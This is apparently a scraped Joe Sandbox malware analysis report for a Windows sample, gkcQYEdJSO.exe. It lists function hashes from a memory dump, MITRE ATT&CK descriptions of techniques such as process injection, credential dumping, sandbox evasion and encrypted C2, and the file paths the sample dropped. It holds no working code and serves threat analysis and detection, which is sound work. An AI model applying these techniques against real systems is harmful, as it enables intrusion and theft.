Instruction Fuzzy Hash: F2314C21B0C51D1FE368B76CA4A6AF873C2DF59336F0405BAE44EC72E7DD18AC418285

Function 00007FFD9BAA0960 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba2979657d5359fc75f46ca3c11870eea168028f18b83e1df3e9cfc61effcbc
Instruction ID: e3e19f0d99709683a277f05576e8e9f4977a985434c02731eb694b6de392abb3
Opcode Fuzzy Hash: 2ba2979657d5359fc75f46ca3c11870eea168028f18b83e1df3e9cfc61effcbc
Instruction Fuzzy Hash: DD313921B0C51D1FE368B7AC64A6AF873C2DF5933AF0405BAE44EC72E7DD18AC418295

Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd74fe07746ae5ae8b615fdd9fd1d92b163f693663eb6d92bb74bec97232f40b
Instruction ID: 50502ca35f105d8d65a5e0d9b27c9c794c37c5c5a828b7274f9edeafbdac0b72
Opcode Fuzzy Hash: cd74fe07746ae5ae8b615fdd9fd1d92b163f693663eb6d92bb74bec97232f40b
Instruction Fuzzy Hash: 0B21E632B0D68D8FE731DBA888612DC7FA1EF41364F1645B7D048CB1E2D5782689C765

Function 00007FFD9BAA1DD2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 235fc2f0b8e97e4659a487cc6a60c650b1c9450573c4ea01a17b9a8c65f6e4b5
Instruction ID: 90cefb0dc11e1ae48cec0d82b032a3c47e5f3abe9d3e7d05d56fb1cacb894f00
Opcode Fuzzy Hash: 235fc2f0b8e97e4659a487cc6a60c650b1c9450573c4ea01a17b9a8c65f6e4b5
Instruction Fuzzy Hash: FE11D332B0D90E4EF7B4A758D8612F873D3EF95320F5201BBD00EC31B2DD696A428654

Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159911fd5b19a0eb75a61d3585d766bce034c46bd0a542543c314db356ee30db
Instruction ID: 9c66f8a2dbfa8b62bd036820e9ebec57138ce62bb2c32918d24522e44e15b6b9
Opcode Fuzzy Hash: 159911fd5b19a0eb75a61d3585d766bce034c46bd0a542543c314db356ee30db
Instruction Fuzzy Hash: EA11A036A0E68D8FE722DBA888602DC7FB1EF42611F0645B7C088DB1A2D574164987A5

Function 00007FFD9BAA57D9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ed49a7b9901fca0d6c04602bde5ccbb35d7c5cbb53e1c149e744fc944e65a3
Instruction ID: aa55ec8baf9b1633af7fe5de06b95b7e6addb1357410dac535ed9253a5431190
Opcode Fuzzy Hash: b8ed49a7b9901fca0d6c04602bde5ccbb35d7c5cbb53e1c149e744fc944e65a3
Instruction Fuzzy Hash: 73017111F1A91E5BFAF4BBA880B527C11C3EF68B10F564175D80ED32E2ECA86E024665

Function 00007FFD9BAA0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef8b80984a001c542b00d4d4e31e8fd5a8b0aae60d8c7b09cc3b59528b080fa
Instruction ID: b8674e8acab62b213863c64388d0138b54cf019125dec326b62ca79fb74936ad
Opcode Fuzzy Hash: aef8b80984a001c542b00d4d4e31e8fd5a8b0aae60d8c7b09cc3b59528b080fa
Instruction Fuzzy Hash: 8901A135A0E78C8FE722DBA8C8602DD7FB1EF42310F0645E7D084DB1A2D5341649CB51

Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc000f49e62384925ffd946102eebee8db935c343f92f725a0336fb5fb6b3857
Instruction ID: 07be4657e2abab1f2f3148745ec0da39e9ad934c745c51dcd2d1d3eafed190e3
Opcode Fuzzy Hash: fc000f49e62384925ffd946102eebee8db935c343f92f725a0336fb5fb6b3857
Instruction Fuzzy Hash: 20019E35A0E38C8FD722DBA8C8902DCBFB1AF02314F1645E7D084DB2A2D5346A48CB91

Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f72c03cc55bb528df03d81815d3f8731a8508c3b3e1cd5c36c559f00718d6fb6
Instruction ID: f172df5a8f4e7a0dabe406e2d53f9cb4336c8eaafabd0478c821f484c0ddd618
Opcode Fuzzy Hash: f72c03cc55bb528df03d81815d3f8731a8508c3b3e1cd5c36c559f00718d6fb6
Instruction Fuzzy Hash: BC018F35A0E3899FE722DBA488A02DDBFB1AF02314F1545E7D484DB2A2D5785A44C751

Function 00007FFD9BAA1E30 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction ID: 0cdce5956dfd2aad368da9f876a670106abe39d53e294c80be7667a48f385cf2
Opcode Fuzzy Hash: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction Fuzzy Hash: ADF01D31B0950E8AEB74AB84C8647F862A2AB65310F1642B6C40ED31A1DEB86A81CB54

Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6985879624f3f0a601ae63b61098d40a2a17c68a347160cedcef2e4fa779de2
Instruction ID: a1314a378271590a601a0bc254d67e49e39a1e1fe820f110aa278d27fc06cbee
Opcode Fuzzy Hash: d6985879624f3f0a601ae63b61098d40a2a17c68a347160cedcef2e4fa779de2
Instruction Fuzzy Hash: 52F02B3525E644CFC702EB39D8A54D57F60FF43114B8A11FAC489CB562C3145C5ECB50

Function 00007FFD9BAA6000 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfb95630c0ff1e4c2aa2d809486a11a9f57281245d73189e45a536d5b113c400
Instruction ID: ae6d572f6925eec2f2f354782599244a4ee4007aea2cf48d041cc3e28f041d75
Opcode Fuzzy Hash: cfb95630c0ff1e4c2aa2d809486a11a9f57281245d73189e45a536d5b113c400
Instruction Fuzzy Hash: 57F04534518E18CFCB59DF48C8A8AA9B7F1FBA8305F110599D04EEB360DB31AA44CF45

Function 00007FFD9BAA6FE4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction ID: 82defcb5808950423b864f7a92d19a0675113c90699388838cd8786899c55a02
Opcode Fuzzy Hash: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction Fuzzy Hash: B2E09220F0D01A46FBB4A344D8A07AD7362DB54310F1540B8E94EE33E1CD38AF81C715

Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction ID: 018e7d0c6f88d1978d8669b4caacb27b964e9cba30c6c91c2b33f4243eb4a29c
Opcode Fuzzy Hash: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction Fuzzy Hash: 3FC08C305119088FC900E72CC88490072A0FB0D210BC20090E00EC7170E25A9C81C700

Function 00007FFD9BAA64E2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction ID: eb64b083c4346731ac76ee28e5d6e4e589b2da607cf5165ea8b2fce35ee9c814
Opcode Fuzzy Hash: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction Fuzzy Hash: 47D0C961E0E55A92F93417D094711BE10929B21710F3B1076D91E5A1E299AA6E029572

Function 00007FFD9BAA17B6 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c2933627fb68ad6d39f89cb5d3dce8728f76259b65858e62ce99d7d37c464a
Instruction ID: 738a2ddbadf74c0e237221c9e85ec4be92c8c3085d36099daa783b34b13ddc47
Opcode Fuzzy Hash: 91c2933627fb68ad6d39f89cb5d3dce8728f76259b65858e62ce99d7d37c464a
Instruction Fuzzy Hash: E4C04C01F1C81A16E25E6714442167D08839F54718F998174E11EC63DEDD6C6A0346CA

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gkcQYEdJSO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Bridgecontainerserver\BrokerhostNet.exe

C:\Bridgecontainerserver\SlMo.bat

C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe

C:\Bridgecontainerserver\cd8865f07816b5

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BrokerhostNet.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\1fab9Y5hcX

Windows Analysis Report
gkcQYEdJSO.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre